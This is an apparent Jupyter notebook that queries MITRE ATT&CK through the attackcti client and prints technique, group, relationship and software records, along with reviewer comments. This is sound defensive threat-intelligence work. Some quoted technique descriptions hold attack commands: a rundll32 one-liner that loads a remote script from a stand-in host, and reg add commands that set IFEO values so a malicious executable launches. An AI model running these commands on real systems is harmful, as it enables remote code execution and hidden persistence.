from attackcti import attack_client
# NOTE(review): a star import binds every public pandas name at module level
# (DataFrame, read_csv, ...), which can shadow names defined later in the
# notebook. None of the visible cells use pandas, so it is left as-is only to
# avoid breaking cells outside this view.
from pandas import *
# NOTE(review): `pandas.io.json.json_normalize` is the older import path; recent
# pandas releases expose the same function as `pandas.json_normalize`. Confirm
# the installed pandas version before switching.
from pandas.io.json import json_normalize
# Client object used by every ATT&CK query in the cells below.
lift = attack_client()
You can use a custom method in the attack_client class to get a technique across all the matrices by its name. It is case sensitive.
# Look up a technique by its display name across all matrices. The match is
# case sensitive ('Rundll32' works, 'rundll32' would not). The result is a
# list of AttackPattern objects; the output below resolves to T1085 and carries
# the x_mitre_detection / x_mitre_data_sources fields a defender would map to.
technique_name = lift.get_technique_by_name('Rundll32')
# Bare expression: renders the returned list in the notebook.
technique_name
[AttackPattern(type='attack-pattern', id='attack-pattern--62b8c999-dcc0-4755-bd69-09442d9359f5', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2017-05-31T21:31:06.045Z', modified='2019-01-31T01:30:34.695Z', name='Rundll32', description='The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.\n\nRundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"</code> This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)', kill_chain_phases=[KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')], external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/techniques/T1085', external_id='T1085'), ExternalReference(source_name='Trend Micro CPL', description='Merces, F. (2014). CPL Malware Malicious Control Panel Items. Retrieved November 1, 2017.', url='https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf'), ExternalReference(source_name='This is Security Command Line Confusion', description='B. Ancel. (2014, August 20). Poweliks – Command Line Confusion. 
Retrieved March 5, 2018.', url='https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_contributors=['Ricardo Dias', 'Casey Smith'], x_mitre_data_sources=['File monitoring', 'Process monitoring', 'Process command-line parameters', 'Binary file metadata'], x_mitre_defense_bypassed=['Anti-virus', 'Application whitelisting', 'Digital Certificate Validation'], x_mitre_detection='Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded.', x_mitre_permissions_required=['User'], x_mitre_platforms=['Windows'], x_mitre_version='1.1')]
# All data-source names known to the client (presumably aggregated from the
# techniques' x_mitre_data_sources fields — verify against the library).
# Note the names come back lower-cased ('process monitoring'), whereas the
# technique objects above carry them as 'Process monitoring'; compare
# case-insensitively when mapping detection coverage against this list.
data_sources = lift.get_all_data_sources()
# Number of distinct data sources (50 at the time this cell was run).
len(data_sources)
50
# Display the full list of data-source names retrieved above.
data_sources
['anti-virus', 'powershell logs', 'process monitoring', 'kernel drivers', 'disk forensics', 'services', 'third-party application logs', 'authentication logs', 'loaded dlls', 'bios', 'process use of network', 'file monitoring', 'api monitoring', 'browser extensions', 'host network interface', 'vbr', 'network intrusion detection system', 'network protocol analysis', 'netflow/enclave netflow', 'asset management', 'application logs', 'detonation chamber', 'wmi objects', 'user interface', 'component firmware', 'dll monitoring', 'mail server', 'ssl/tls inspection', 'email gateway', 'windows registry', 'process command-line parameters', 'data loss prevention', 'malware reverse engineering', 'web logs', 'web proxy', 'access tokens', 'windows error reporting', 'packet capture', 'dns records', 'binary file metadata', 'digital certificate logs', 'system calls', 'mbr', 'named pipes', 'windows event logs', 'web application firewall logs', 'efi', 'network device logs', 'sensor health and status', 'environment variable']
# Fetch a STIX object by its STIX type and its ATT&CK external id. The lookup
# spans all matrices: T1307 below resolves to a PRE-ATT&CK technique
# (kill_chain_name='mitre-pre-attack', x_mitre_old_attack_id='PRE-T1084'),
# so do not assume the result belongs to the Enterprise matrix.
object_by_id = lift.get_object_by_attack_id('attack-pattern', 'T1307')
# Bare expression: renders the returned list in the notebook.
object_by_id
[AttackPattern(type='attack-pattern', id='attack-pattern--286cc500-4291-45c2-99a1-e760db176402', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2017-12-14T16:46:06.044Z', modified='2018-10-17T00:14:20.652Z', name='Acquire and/or use 3rd party infrastructure services', description='A wide variety of cloud, virtual private services, hosting, compute, and storage solutions are available. Additionally botnets are available for rent or purchase. Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: LUCKYCAT2012)', kill_chain_phases=[KillChainPhase(kill_chain_name='mitre-pre-attack', phase_name='adversary-opsec')], external_references=[ExternalReference(source_name='mitre-pre-attack', url='https://attack.mitre.org/techniques/T1307', external_id='T1307'), ExternalReference(source_name='LUCKYCAT2012', description='Forward-Looking Threat Research Team. (2012). LUCKYCAT REDUX: Inside an APT Campaign with Multiple Targets in India and Japan. Retrieved March 1, 2017.')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_detectable_by_common_defenses='No', x_mitre_detectable_by_common_defenses_explanation='3rd party services highly leveraged by legitimate services, hard to distinguish from background noise. While an adversary can use their own infrastructure, most know this is a sure- re way to get caught. To add degrees of separation, they can buy or rent from another adversary or accomplice.', x_mitre_difficulty_for_adversary='Yes', x_mitre_difficulty_for_adversary_explanation='Wide range of 3rd party services for hosting, rotating, or moving C2, static data, exploits, exfiltration, etc.', x_mitre_old_attack_id='PRE-T1084', x_mitre_version='1.0')]
You can get any Group by its Alias property across all the matrices. It is case sensitive.
# Look up a group by any of its aliases (case sensitive). 'Cozy Bear' resolves
# to the IntrusionSet named APT29 (G0016), whose `aliases` list contains the
# alias queried; the canonical name is in `name`, not in the alias used.
group_name = lift.get_group_by_alias('Cozy Bear')
# Bare expression: renders the returned list in the notebook.
group_name
[IntrusionSet(type='intrusion-set', id='intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2017-05-31T21:31:52.748Z', modified='2019-04-15T21:56:31.571Z', name='APT29', description='[APT29](https://attack.mitre.org/groups/G0016) is threat group that has been attributed to the Russian government and has operated since at least 2008. (Citation: F-Secure The Dukes) (Citation: GRIZZLY STEPPE JAR) This group reportedly compromised the Democratic National Committee starting in the summer of 2015. (Citation: Crowdstrike DNC June 2016)', aliases=['APT29', 'YTTRIUM', 'The Dukes', 'Cozy Bear', 'CozyDuke'], external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/groups/G0016', external_id='G0016'), ExternalReference(source_name='APT29', description='(Citation: F-Secure The Dukes)(Citation: FireEye APT29 Nov 2018)'), ExternalReference(source_name='YTTRIUM', description='(Citation: Microsoft Unidentified Dec 2018)'), ExternalReference(source_name='The Dukes', description='(Citation: F-Secure The Dukes)'), ExternalReference(source_name='Cozy Bear', description='(Citation: Crowdstrike DNC June 2016)'), ExternalReference(source_name='CozyDuke', description='(Citation: Crowdstrike DNC June 2016)'), ExternalReference(source_name='F-Secure The Dukes', description='F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.', url='https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf'), ExternalReference(source_name='GRIZZLY STEPPE JAR', description='Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. 
Retrieved January 11, 2017.', url='https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf'), ExternalReference(source_name='Crowdstrike DNC June 2016', description='Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.', url='https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/'), ExternalReference(source_name='FireEye APT29 Nov 2018', description='Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. Retrieved November 27, 2018.', url='https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html'), ExternalReference(source_name='Microsoft Unidentified Dec 2018', description='Microsoft Defender Research Team. (2018, December 3). Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers. Retrieved April 15, 2019.', url='https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_version='1.1')]
# Retrieve every group object, then pick the first one. Which group comes
# first depends on the order the server returns — the output below happened to
# be TEMP.Veles; do not rely on this index being stable between runs.
groups = lift.get_all_groups()
one_group = groups[0]
# All STIX relationships in which this group participates. The sample output
# is a 'uses' relationship whose source_ref is the intrusion-set and whose
# target_ref is an attack-pattern; other relationship types may be present.
relationships = lift.get_relationships_by_object(one_group)
# Display the first relationship (raises IndexError if the group has none).
relationships[0]
Relationship(type='relationship', id='relationship--60d2b385-14cf-454a-ac92-0d41e3ec397a', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2019-04-24T19:50:33.751Z', modified='2019-04-29T18:59:16.590Z', relationship_type='uses', description='[TEMP.Veles](https://attack.mitre.org/groups/G0088) has modified files based on the open-source project cryptcat in an apparent attempt to decrease AV detection rates.', source_ref='intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4', target_ref='attack-pattern--00d0b012-8a03-410e-95de-5826bf542de6', external_references=[ExternalReference(source_name='FireEye TEMP.Veles 2018', description='FireEye Intelligence . (2018, October 23). TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers. Retrieved April 16, 2019.', url='https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html ')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'])
The difference between this function and get_all_techniques() is that get_techniques_mitigated_by_all_mitigations returns only the techniques that have mitigations mapped to them.
# Techniques that have at least one mitigation mapped to them (unlike
# get_all_techniques(), which returns every technique regardless of coverage).
techniques_mitigated = lift.get_techniques_mitigated_by_all_mitigations()
# Display the first entry — an AttackPattern (T1495 in the output below).
techniques_mitigated[0]
AttackPattern(type='attack-pattern', id='attack-pattern--f5bb433e-bdf6-4781-84bc-35e97e43be89', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2019-04-12T18:28:15.451Z', modified='2019-04-29T13:50:06.026Z', name='Firmware Corruption', description='Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices could include the motherboard, hard drive, or video cards.', kill_chain_phases=[KillChainPhase(kill_chain_name='mitre-attack', phase_name='impact')], external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/techniques/T1495', external_id='T1495'), ExternalReference(source_name='Symantec Chernobyl W95.CIH', description='Yamamura, M. (2002, April 25). W95.CIH. Retrieved April 12, 2019.', url='https://www.symantec.com/security-center/writeup/2000-122010-2655-99'), ExternalReference(source_name='MITRE Trustworthy Firmware Measurement', description='Upham, K. (2014, March). Going Deep into the BIOS with MITRE Firmware Security Research. Retrieved January 5, 2016.', url='http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_data_sources=['BIOS', 'Component firmware'], x_mitre_detection='System firmware manipulation may be detected.(Citation: MITRE Trustworthy Firmware Measurement) Log attempts to read/write to BIOS and compare against known patching behavior.', x_mitre_impact_type=['Availability'], x_mitre_permissions_required=['Administrator', 'root', 'SYSTEM'], x_mitre_platforms=['Linux', 'macOS', 'Windows'], x_mitre_version='1.0')
This function returns information about a specific software STIX object.
# Retrieve every software object (malware and tools) and take the first one;
# the index is only as stable as the server's ordering.
all_software = lift.get_all_software()
one_software = all_software[0]
# Techniques this software object is related to. The result is a list of
# AttackPattern objects (T1482 Domain Trust Discovery in the output below).
software_techniques = lift.get_techniques_used_by_software(one_software)
# Display the first technique (raises IndexError if none are mapped).
software_techniques[0]
AttackPattern(type='attack-pattern', id='attack-pattern--767dbf9e-df3f-45cb-8998-4903ab5f80c0', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2019-02-14T16:15:05.974Z', modified='2019-04-29T14:06:06.900Z', name='Domain Trust Discovery', description='Adversaries may attempt to gather information on domain trust relationships that may be used to identify [Lateral Movement](https://attack.mitre.org/tactics/TA0008) opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.(Citation: Microsoft Trusts) Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection](https://attack.mitre.org/techniques/T1178), [Pass the Ticket](https://attack.mitre.org/techniques/T1097), and [Kerberoasting](https://attack.mitre.org/techniques/T1208).(Citation: AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts can be enumerated using the DSEnumerateDomainTrusts() Win32 API call, .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)', kill_chain_phases=[KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')], external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/techniques/T1482', external_id='T1482'), ExternalReference(source_name='Microsoft Trusts', description='Microsoft. (2009, October 7). Trust Technologies. Retrieved February 14, 2019.', url='https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc759554(v=ws.10)'), ExternalReference(source_name='AdSecurity Forging Trust Tickets', description='Metcalf, S. 
(2015, July 15). It’s All About Trust – Forging Kerberos Trust Tickets to Spoof Access across Active Directory Trusts. Retrieved February 14, 2019.', url='https://adsecurity.org/?p=1588'), ExternalReference(source_name='Harmj0y Domain Trusts', description='Schroeder, W. (2017, October 30). A Guide to Attacking Domain Trusts. Retrieved February 14, 2019.', url='http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/ '), ExternalReference(source_name='Microsoft Operation Wilysupply', description='Florio, E.. (2017, May 4). Windows Defender ATP thwarts Operation WilySupply software supply chain cyberattack. Retrieved February 14, 2019.', url='https://www.microsoft.com/security/blog/2017/05/04/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/'), ExternalReference(source_name='Microsoft GetAllTrustRelationships', description='Microsoft. (n.d.). Domain.GetAllTrustRelationships Method. Retrieved February 14, 2019.', url='https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectory.domain.getalltrustrelationships?redirectedfrom=MSDN&view=netframework-4.7.2#System_DirectoryServices_ActiveDirectory_Domain_GetAllTrustRelationships')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_contributors=['Dave Westgard', 'Elia Florio, Microsoft', 'Mnemonic', 'RedHuntLabs (@redhuntlabs)'], x_mitre_data_sources=['PowerShell logs', 'API monitoring', 'Process command-line parameters', 'Process monitoring'], x_mitre_detection='System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information, such as <code>nltest /domain_trusts</code>. 
Remote access tools with built-in features may interact directly with the Windows API to gather information. Look for the DSEnumerateDomainTrusts() Win32 API call to spot activity associated with [Domain Trust Discovery](https://attack.mitre.org/techniques/T1482).(Citation: Harmj0y Domain Trusts) Information may also be acquired through Windows system management tools such as [PowerShell](https://attack.mitre.org/techniques/T1086). The .NET method GetAllTrustRelationships() can be an indicator of [Domain Trust Discovery](https://attack.mitre.org/techniques/T1482).(Citation: Microsoft GetAllTrustRelationships)\n', x_mitre_permissions_required=['User'], x_mitre_platforms=['Windows'], x_mitre_version='1.0')
If you do not provide the name of a specific Group (Case Sensitive), the function returns information about all the groups available across all the matrices.
# Retrieve every group and take the first one (ordering is server-defined).
groups = lift.get_all_groups()
one_group = groups[0]
# Techniques mapped to this group. The sample output is T1183 (Image File
# Execution Options Injection), whose x_mitre_detection text names the
# Registry paths and API calls worth monitoring.
group_techniques = lift.get_techniques_used_by_group(one_group)
# Display the first technique (raises IndexError if none are mapped).
group_techniques[0]
AttackPattern(type='attack-pattern', id='attack-pattern--62166220-e498-410f-a90a-19d4339d4e99', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2018-01-16T16:13:52.465Z', modified='2018-10-31T13:45:13.024Z', name='Image File Execution Options Injection', description='Image File Execution Options (IFEO) enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., “C:\\dbg\\ntsd.exe -g notepad.exe”). (Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nIFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as <code>Debugger</code> values in the Registry under <code>HKLM\\SOFTWARE{\\Wow6432Node}\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\<executable></code> where <code><executable></code> is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nIFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IEFO and silent process exit Registry values in <code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\</code>. 
(Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)\n\nAn example where the evil.exe process is started when notepad.exe exits: (Citation: Oddvar Moe IFEO APR 2018)\n\n* <code>reg add "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512</code>\n* <code>reg add "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe" /v ReportingMode /t REG_DWORD /d 1</code>\n* <code>reg add "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe" /v MonitorProcess /d "C:\\temp\\evil.exe"</code>\n\nSimilar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may be abused to obtain persistence and privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Endgame Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous invocation.\n\nMalware may also use IFEO for Defense Evasion by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)', kill_chain_phases=[KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')], external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/techniques/T1183', external_id='T1183'), ExternalReference(source_name='Microsoft Dev Blog IFEO Mar 2010', description='Shanbhag, M. (2010, March 24). Image File Execution Options (IFEO). 
Retrieved December 18, 2017.', url='https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/'), ExternalReference(source_name='Microsoft GFlags Mar 2017', description='Microsoft. (2017, May 23). GFlags Overview. Retrieved December 18, 2017.', url='https://docs.microsoft.com/windows-hardware/drivers/debugger/gflags-overview'), ExternalReference(source_name='FSecure Hupigon', description='FSecure. (n.d.). Backdoor - W32/Hupigon.EMV - Threat Description. Retrieved December 18, 2017.', url='https://www.f-secure.com/v-descs/backdoor_w32_hupigon_emv.shtml'), ExternalReference(source_name='Symantec Ushedix June 2008', description='Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December 18, 2017.', url='https://www.symantec.com/security_response/writeup.jsp?docid=2008-062807-2501-99&tabid=2'), ExternalReference(source_name='Microsoft Silent Process Exit NOV 2017', description='Marshall, D. & Griffin, S. (2017, November 28). Monitoring Silent Process Exit. Retrieved June 27, 2018.', url='https://docs.microsoft.com/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit'), ExternalReference(source_name='Oddvar Moe IFEO APR 2018', description='Moe, O. (2018, April 10). Persistence using GlobalFlags in Image File Execution Options - Hidden from Autoruns.exe. Retrieved June 27, 2018.', url='https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/'), ExternalReference(source_name='Endgame Process Injection July 2017', description='Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. 
Retrieved December 7, 2017.', url='https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_contributors=['Oddvar Moe, @oddvarmoe'], x_mitre_data_sources=['Process monitoring', 'Windows Registry', 'Windows event logs'], x_mitre_defense_bypassed=['Autoruns Analysis'], x_mitre_detection='Monitor for common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as <code>DEBUG_PROCESS</code> and <code>DEBUG_ONLY_THIS_PROCESS</code>. (Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nMonitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Endgame Process Injection July 2017)', x_mitre_permissions_required=['Administrator', 'SYSTEM'], x_mitre_platforms=['Windows'], x_mitre_version='1.0')
You can retrieve every piece of software (malware or tool) mapped to a specific Group STIX object.
# Retrieve every group and take the first one (ordering is server-defined).
groups = lift.get_all_groups()
one_group = groups[0]
# Software (malware or tool objects) mapped to this group. The sample output
# is a Tool object (PsExec, S0029); malware entries would come back as a
# different STIX type, so check `type` before treating all entries alike.
group_software = lift.get_software_used_by_group(one_group)
# Display the first software object (raises IndexError if none is mapped).
group_software[0]
Tool(type='tool', id='tool--ff6caf67-ea1f-4895-b80e-4bb0fc31c6db', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2017-05-31T21:32:21.771Z', modified='2018-10-17T00:14:20.652Z', name='PsExec', description='[PsExec](https://attack.mitre.org/software/S0029) is a free Microsoft tool that can be used to execute a program on another computer. It is used by IT administrators and attackers. (Citation: Russinovich Sysinternals) (Citation: SANS PsExec)', labels=['tool'], external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/software/S0029', external_id='S0029'), ExternalReference(source_name='Russinovich Sysinternals', description='Russinovich, M. (2014, May 2). Windows Sysinternals PsExec v2.11. Retrieved May 13, 2015.', url='https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx'), ExternalReference(source_name='SANS PsExec', description='Pilkington, M.. (2012, December 17). Protecting Privileged Domain Accounts: PsExec Deep-Dive. Retrieved August 17, 2016.', url='https://digital-forensics.sans.org/blog/2012/12/17/protecting-privileged-domain-accounts-psexec-deep-dive')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_aliases=['PsExec'], x_mitre_platforms=['Windows'], x_mitre_version='1.0')